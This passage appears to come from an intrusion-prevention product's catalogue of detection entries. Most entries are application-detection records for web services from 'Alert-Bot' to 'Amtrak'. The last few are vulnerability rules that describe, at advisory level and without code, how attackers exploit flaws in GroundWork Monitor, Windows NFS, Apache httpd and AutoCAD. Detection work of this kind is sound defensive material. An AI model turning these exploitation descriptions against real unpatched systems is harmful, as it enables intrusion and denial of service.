Description: All attempts to send an alert notification to the recipients in the Alert Chain have failed. Check the Alert Chain and that the alert channels are properly configured and working.
Back to top

Alert-Bot

About this situation: Application Alert-Bot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alert Bot - Website Monitoring suite of tools. Test web pages, login areas, checkout processes and more.
Back to top

Alert-online

About this situation: Application Alert-online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ALERT's mission is to improve health and prolong life, achieve profitability to benefit society, and inspire others to excel like we do. The ALERT Group of Companies is fully committed to the development, distribution and implementation of ALERT healthcare solutions, designed to create paper-free clinical environments. Values Excellence, competence, transparency, generosity and love for life in all its forms represent ALERT's values.
Back to top

AlertFox

About this situation: Application AlertFox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AlertFox - subscription-based uptime and web performance monitoring service, Find website performance problems before your users do.
Back to top

AlertLogic

About this situation: Application AlertLogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alert Logic managed Security-as-a-Service solutions provide network, system, and web application security, wherever your infrastructure resides.
Back to top

Alertsec-Xpress-Full-Disk-Encryption

About this situation: Application Alertsec-Xpress-Full-Disk-Encryption detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alertsec Xpress offers Full Disk Encryption from Check Point (former Pointsec) as a fully managed service. Full disk encryption protects information by encrypting all data stored on a hard drive. This includes the operating system and empty space, as well as installed programs and files. This technology makes it impossible for an unauthorized person to read your files.
Back to top

AlertSite

About this situation: Application AlertSite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AlertSite - Proactively monitor and optimize the performance of your websites, applications and APIs. Show availability, speed and user experience optimization are crucial to online success.
Back to top

Alexa

About this situation: Application Alexa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alexa is a web information company that offers website information and analytics.
Back to top

Alfoo

About this situation: Alfoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese photo sharing service that allows users to upload and share photos.
Back to top

Alfresco

About this situation: Application Alfresco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alfresco is a content management system for Microsoft Windows and Unix-like operating systems.
Back to top

ALFsys

About this situation: Application ALFsys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ALFsys.com gives you a complete assisted living software system to manage resident census, services scheduling, incident reports, automated assessments, facility maintenance, resident billing receivables, staff data, scheduling staff and marketing.
Back to top

Alice

About this situation: Application Alice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alice Mail is the mail box for customers of Telecom Italy. Allows you to manage your other email accounts, to keep in touch with friends on Facebook and meet all communication needs from a PC or mobile phone
Back to top

AlienVault

About this situation: Application AlienVault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AlienVault provides a platform with built-in security controls for organizations to address their compliance and threat management needs.
Back to top

AliExpress

About this situation: AliExpress usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Description: AliExpress is an online marketplace.
Back to top

Aliim

About this situation: AliIM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: This is a free Windows-based application.
Back to top

Alisoft

About this situation: alisoft usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Alisoft isa medium-sized enterprises; Web-based business model a breakthrough for China's software industry
Back to top

Alive-Torrents

About this situation: ALIVE TORRENTS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

AliWW

About this situation: AliWW usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-629-5211
Description: AliWW is an Internet-based communication software. AliWW facilitates buyers and sellers of Taobao (China's largers Internet retail website) to communicate before and after making an online transaction.
Back to top

AliWW-Audio-Video

About this situation: AliWW Audio/Video usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Media
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: AliWW is an Internet-based communication software. AliWW facilitates buyers and sellers of Taobao (China's largers Internet retail website) to communicate before and after making an online transaction.
Back to top

AliWW-File-Transfer

About this situation: Aliww File Transfer usage detected
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: AliWW is an Internet-based communication software. AliWW facilitates buyers and sellers of Taobao (China's largers Internet retail website) to communicate before and after making an online transaction.
Back to top

AliWW-Instant-Messaging

About this situation: AliWW Instant Messaging detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-628-5211
Description: AliWW is an instant messaging communication software designated for China's largest Internet retail 'Taobao'
Back to top

AliWW-Remote-Control

About this situation: AliWW remote control usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-628-5211
Description: AliWW is an Internet-based communication software. AliWW facilitates buyers and sellers of Taobao (China's largers Internet retail website) to communicate before and after making an online transaction.
Back to top

Aliyun.com

About this situation: Application Aliyun.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aliyun.com provides secure, reliable cloud computing infrastructure services.
Back to top

ALL-INKL

About this situation: Application ALL-INKL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ALL-INKL is a platform that provides access to the trusted news titles.
Back to top

All-Slots-Casino

About this situation: All Slots Casino usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-630-5211
Description: All Slots Casino is a online slots casino that offers more than 400 online casino games, including lots of online slot machines as well as keno, blackjack, online poker, video poker, baccarat, roulette, craps, Sic Bo, scratch card, and casino war. The client program uses HTTP as the underlying communication protocol.
Back to top

Allbound

About this situation: Application Allbound detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Allbound provides mobile SaaS toolset for channel partner training, content marketing, collaboration.
Back to top

Allclients

About this situation: AllClients usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Allocatesoftware

About this situation: Application Allocatesoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Allocate Software provider of specialist workforce optimisation, organisational flow improvement, corporate governance, risk
Back to top

Allscripts

About this situation: Application Allscripts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Allscripts provides healthcare information technology solutions.
Back to top

Allstate-Insurance

About this situation: Application Allstate-Insurance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Allstate Corporation is personal lines insurer in the United States. Allstate offers car insurance, home, property, condo and renters insurance, plus insurance for recreational vehicles like motorcycles, boats and more.
Back to top

allthings

About this situation: Application allthings detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Allthings it cloud-based app (both Web and Mobile) designed to help you organise your business and personal life. Share lists and manage workflow, whilst also being able to upload documents and assign tasks to others - great for teams including remote workers, whilst also utilising with clients.
Back to top

ALMSA

About this situation: Application ALMSA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ALMSA Assisted Living Software Platform. Covering the full range of community needs - EHR, assessment, care plan, financials, eMAR, and risk.
Back to top

Aloha-Enterprise

About this situation: Application Aloha-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Aloha Enterprise solution is a complete technology solution built specifically for the needs of restaurant operators of all sizes everywhere.
Back to top

AlphaBricks

About this situation: Application AlphaBricks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AlphaBricks specializes in solutions on Cloud Computing, Financial Products(XBRL), Compliance Management and Business Intelligence. It also delivers Business Intelligence Solutions for Integrated data management, Mobile Analytics and Mobile dashboards for the Executives on the move.
Back to top

Alsamarketing-Marketing-Automation

About this situation: Application Alsamarketing-Marketing-Automation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Alsamarketing is an on-demand web marketing automation suite that makes to create, automate and measure online marketing efforts. Automatically track, score, and nurture prospects from the moment of lead generation through sale.
Back to top

ALTBalaji

About this situation: ALTBalaji usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1664-5242
Last changed: sgpkg-ips-1664-5242
Description: ALTBalaji is an Indian video on demand platform. This application situation is meant for blocking the application.
Back to top

AltDrive

About this situation: Application AltDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AltDrive - Online backup service. Automatically backs up your files to our secure site.
Back to top

Alternative Journals

About this situation: Online equivalents to supermarket tabloids and other fringe publications.
Context: URL Application Context
Severity: 1
Tags: News and Media, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Online equivalents to supermarket tabloids and other fringe publications.
Back to top

Altibase

About this situation: Application Altibase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Altibase is a trusted and proven In-Memory database management system with the fastest in-memory database technology and outstanding support .
Back to top

Altify

About this situation: Application Altify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Altify software helps progressive sales teams accelerate revenue by putting their customers first.
Back to top

Altra

About this situation: Application Altra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Altra Federal Credit Union is a Federal Credit Union with 19 branches.
Back to top

Altran

About this situation: Application Altran detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Altran provide engineering consulting, Altran accompanies its clients in the creation and development of their new products and services. Altran's Innovation Makers have been providing services for thirty years to key players in the Aerospace, Automotive, Energy, Railways, Finance, Healthcare and Telecoms sectors. Covering every stage of project development from strategic planning to manufacturing.
Back to top

Altus-Dynamics-CRM-Suite

About this situation: Application Altus-Dynamics-CRM-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Altus Dynamics delivering valuable implementation and support services in ERP and CRM solutions in the Non-profit, Education and Government markets in North America.
Back to top

Alumni-Plus-(A+)

About this situation: Application Alumni-Plus-(A+) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A
Back to top

AlwaysOnPC

About this situation: Application AlwaysOnPC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AlwaysOnPC gives you a complete virtual computer pre-loaded with over 40 apps that you can access and use from any iPad, iPhone / iPod Touch or Android smartphones.
Back to top

Amara

About this situation: Amara usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Amara makes it easy to caption and translate your videos. You can instantly invite your friends and audience members to help. Amara On Demand provides affordable, high quality subtitles, whether you have an individual video or an entire library
Back to top

Amazon

About this situation: Amazon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1676-5242
Description: Amazon is a popular electronic commerce company.
Back to top

Amazon Chime

About this situation: Amazon Chime usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1769-5242
Description: Amazon Chime is a communications service that allows users to meet, chat, and place calls.
Back to top

Amazon Prime

About this situation: Amazon Prime usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1692-5242
Description: Amazon Prime is a on-demand video streaming service. This application situation is meant for blocking the application.
Back to top

Amazon-Advantage

About this situation: Application Amazon-Advantage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amazon Advantage is a self-service tool that enables to promote and sell media products on Amazon.co.uk.
Back to top

Amazon-Advertising

About this situation: Amazon Advertising detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1764-5242
Description: Amazon Advertising is an ad solution provided by Amazon.
Back to top

Amazon-Affiliate-Program

About this situation: Application Amazon-Affiliate-Program detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amazon Associates is affiliate marketing program. The Amazon Associates program has a 12
Back to top

Amazon-AWS

About this situation: Amazon Web Services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1678-5242
Description: Amazon Web Services (AWS) content delivery network usage has been detected.
Back to top

Amazon-Cloud-Drive

About this situation: Amazon Cloud Drive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: It stores your music, videos, photos, and documents on Amazon's secure servers.
Back to top

Amazon-Cloud-Player

About this situation: Amazon Cloud Player usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A browser based application that securely store your entire digital music collection.
Back to top

Amazon-CloudFront

About this situation: Amazon CloudFront usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1128-5242
Description: Amazon CloudFront is a content delivery service.
Back to top

Amazon-Mechanical-Turk-Worker

About this situation: Application Amazon-Mechanical-Turk-Worker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amazon Mechanical Turk is the online market place for work. We give businesses and developers access to an on-demand scalable workforce.
Back to top

Amazon-S3

About this situation: Amazon Simple Storage Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1374-5242
Description: Amazon Simple Storage Service (S3) usage has been detected.
Back to top

Amazon-WorkSpaces

About this situation: Amazon WorkSpaces usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1238-5242
Description: Amazon WorkSpaces is a service proviced by Amazon for managing cloud desktops. Amazon WorkSpaces can be used to provision and manage both Windows and Linux desktops.
Back to top

Ambassador

About this situation: Application Ambassador detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ambassador empowers businesses to increase revenue by leveraging the power of recommendations.
Back to top

Amber-Road

About this situation: Application Amber-Road detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amber Road specializes in global trade management software for importers, exporters, and third-party logistics service providers.
Back to top

Ameba

About this situation: Ameba usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This site is a Japanese social networking and blogging service. Source: Wikipedia
Back to top

aMember-Pro

About this situation: Application aMember-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: aMember Pro provides membership payments, manage profiles, deliver digital content, integrate with your blog, CMS, send newsletters, run affiliate program with software.
Back to top

America-First-Credit-Union

About this situation: Application America-First-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: America First Credit Union
Back to top

American-Airlines

About this situation: American Airlines usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to purchase flights and vacation packages. Source: Wikipedia
Back to top

American-Bar-Association

About this situation: Application American-Bar-Association detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: American Bar Association is a voluntary bar association of lawyers and law students.
Back to top

American-Hotel-and-Lodging-Assc.

About this situation: Application American-Hotel-and-Lodging-Assc. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: American Hotel and Lodging Association
Back to top

Amerilert

About this situation: Application Amerilert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amerilert is unified mass notification system for mid-sized businesses, non-profits and government clients. Amerilert enables non-technical staff to send custom or predefined messages from one interface to thousands of people anywhere, anytime, on any device for improved crisis communications, emergency management, business continuity, and disaster recovery.
Back to top

Ameriprise-Financial

About this situation: Application Ameriprise-Financial detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ameriprise Financial provides financial planning and services.
Back to top

Ameritas

About this situation: Application Ameritas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Ameritas Life Insurance Company is a mutual insurance company.
Back to top

Ammyy

About this situation: Application Ammyy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ammyy is a zero-config remote desktop software. It's used for system administration, webinars and instant remote desktop connection over the Internet.
Back to top

Ammyy-Admin

About this situation: Ammyy Admin usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-665-5211
Description: Ammyy Admin is a remote control application that allows users to securely access and control remote computers.
Back to top

Amobee

About this situation: Application Amobee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Kontera provides publishers with incremental advertising revenues from their mobile or PC web pages. Kontera specializes in bringing highly relevant content and information from brands, and as a result our ads are often viewed as native ads that are least disruptive to the consumer experience. We provide a unique suite of In-Content and Mobile monetization products.
Back to top

amoCRM

About this situation: Application amoCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: amoCRM is Web-based CRM solution available. Create custom fields on the fly, and modify lead statuses when you need to. Add new users to amoCRM quickly, and change their user management settings easily. As the administrator, you can set each person to only see the data you want them to see. Use iPhone or Android apps to see your customer notes and even the tasks assigned to you and best of all, amoCRM integrates with other services like MailChimp, Wufoo, Zendesk, Dropbox.
Back to top

Amosoft

About this situation: Application Amosoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amosoft is a provider of EDI and supply chain integration, synchronization and collaboration solutions. It offers an outsourced EDI and supply chain management solutions to help companies connect with business partners.
Back to top

AMPAC

About this situation: Application AMPAC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AMPAC Software is web application and for start-to-finish solutions helping gain control over financial data. With more than 33 Specialized Integrated Modules and Sub-modules are allowing to avoid repetitive and labor intensive functions and to gain control over the integrity of membership data.
Back to top

AmpliFi

About this situation: Application AmpliFi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AmpliFis wireless router provides Wi-Fi for your connected home. Use high-speed network mesh points to eliminate dead spots and boost your personal IOT.
Back to top

Ampparit

About this situation: Ampparit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Description: Ampparit is a Finnish news aggregator service.
Back to top

AMQP

About this situation: AMQP usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description: AMQP (Advanced Message Queuing Protocol) is a message-oriented protocol for business messaging.
Back to top

Amsoftware

About this situation: Application Amsoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: American Software, Inc. develops, markets, and supports a portfolio of software and services that deliver enterprise management and collaborative supply chain solutions to the global marketplace. The company also provides support for its software products, such as software enhancements, documentation, updates, customer education, consulting, systems integration services, maintenance, and support services
Back to top

Amtrak

About this situation: Application Amtrak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Amtrak is a service of national railroad passenger corporation for booking of tickets and getting updates of trains arrival and departures.
Back to top

AMX-Device-Discovery

About this situation: AMX Device Discovery traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-759-5211
Description: AMX Device Discovery traffic detected. AMX Device Discovery is a protocol used by AMX Duet/NetLinx to discover available multimedia devices.
Back to top

Analytica

About this situation: Application Analytica detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Analytica is a visual software package for creating, analyzing and communicating quantitative decision models.
Back to top

Analyzer-GroundWork-Monitor-Monarch-Scan-Session-Hijack

About this situation: A vulnerability in GroundWork Monitor Enterprise
Context: Sequence
Severity: 5
Tags: Potential Compromise, TCP Client Traffic
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-536-5211
Vulnerability: GroundWork-Monitor-Monarch-Scan-Ref
Description: A vulnerability in monarch_scan.cgi in GroundWork Monitor Enterprise 6.7.0 allows remote authenticated users to execute arbitrary commands by leveraging an authenticated JOSSO Single sign-on cookie.
Back to top

Analyzer-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference

About this situation: A vulnerability in Microsoft Windows Server
Context: Sequence
Severity: 8
Tags: Windows Server, Any Operating System not specific, Suspected Compromise
First detected in: sgpkg-ips-511-5211
Last changed: sgpkg-ips-511-5211
Vulnerability: Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Description: A denial-of-service vulnerability has been reported in Microsoft Windows NFS Server. The vulnerability is caused by a NULL pointer dereference that can occur when an invalid NFS file operation is requested on a read-only share. A remote attacker can exploit this vulnerability by sending a malicious NFS request. Successful exploitation can lead to a denial-of-service condition of the target system.
Back to top

Analyzer_Apache-Http-Server-Mod_status-Heap-Buffer-Overflow

About this situation: A vulnerability in Apache Software Foundation HTTP Server (httpd)
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Suspected Compromise
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Description: A heap buffer overflow vulnerability exists in Apache httpd. The vulnerability is due to a race condition in the mod_status module running on a server with threaded MPM. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted requests to the server status page. Successful exploit may result in information disclosure or code execution. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Apache-httpd-Range-Header-Field-Memory-Exhaustion

About this situation: An attempt to exploit the Apache httpd Range Header Field Memory Exhaustion vulnerability detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Suspected Compromise
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-438-4219
Vulnerability: Apache-Httpd-Range-Header-Field-Memory-Exhaustion
Description: An attempt to exploit a memory exhaustion vulnerability (CVE-2011-3192) in Apache httpd has been detected. There have been several HTTP requests with a suspiciously long Range or Request-Range header field. A Range or Request-Range header field that specifies several byte ranges can cause the application to consume excessive resources, causing the vulnerable server to become unresponsive. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Autodesk-Autocad-Insecure-FAS-Loading

About this situation: A vulnerability in Autodesk AutoCAD
Context: Sequence
Severity: 5
Tags: Suspected Compromise, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Description: A code execution vulnerability has been reported in AutoCAD. The vulnerability is due to using improper search path when loading FAS files. A remote attacker could exploit this vulnerability by enticing a user to process an FAS file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application. CVE-2014-0818
Back to top

Analyzer_Autodesk-Autocad-Insecure-FAS-Loading-2

About this situation: A vulnerability in Autodesk AutoCAD
Context: Sequence
Severity: 5
Tags: Suspected Compromise, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Description: A code execution vulnerability has been reported in AutoCAD. The vulnerability is due to using improper search path when loading FAS files. A remote attacker could exploit this vulnerability by enticing a user to process an FAS file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application. CVE-2014-0818
Back to top

Analyzer_Autodesk-Autocad-Insecure-Library-Loading

About this situation: A vulnerability in Autodesk AutoCAD
Context: Sequence
Severity: 5
Tags: Suspected Compromise, TCP Client Traffic
